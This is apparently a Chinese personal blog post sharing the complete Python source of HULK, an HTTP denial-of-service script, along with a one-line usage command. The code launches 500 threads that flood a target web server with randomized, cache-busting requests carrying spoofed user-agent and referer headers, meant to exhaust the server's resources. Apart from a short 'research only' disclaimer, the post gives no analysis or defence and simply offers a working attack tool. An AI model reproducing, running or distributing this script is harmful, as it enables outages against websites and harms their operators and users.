注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

suzumiya

宅窝

 
 
 

日志

 
 

一个基于python的dos脚本  

2016-02-06 08:11:12|  分类: 安全工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
一个基于python的dos脚本 - Saya - 抖m型丧病女仆的宅窝

源码:
-----------------------萌萌哒分割线----------------------
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
global request_counter
request_counter+=1

def set_flag(val):
global flag
flag=val

def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)

# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)

def usage():
print '---------------------------------------------------'
print 'USAGE: python hulk.py <url>'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'

#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Response Code 500'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)

#http caller thread 
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "\n-- HULK Attack Finished --"

#execute 
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- HULK Attack Started --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()

 -----------------------萌萌哒分割线----------------------

命令:xx.py http://xxxx.com safe
一个基于python的dos脚本 - Saya - 抖m型丧病女仆的宅窝
 

一个基于python的dos脚本 - Saya - 抖m型丧病女仆的宅窝
 
 
转载请注明原文地址:http://lsaya.blog.163.com/
  评论这张
 
阅读(130)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017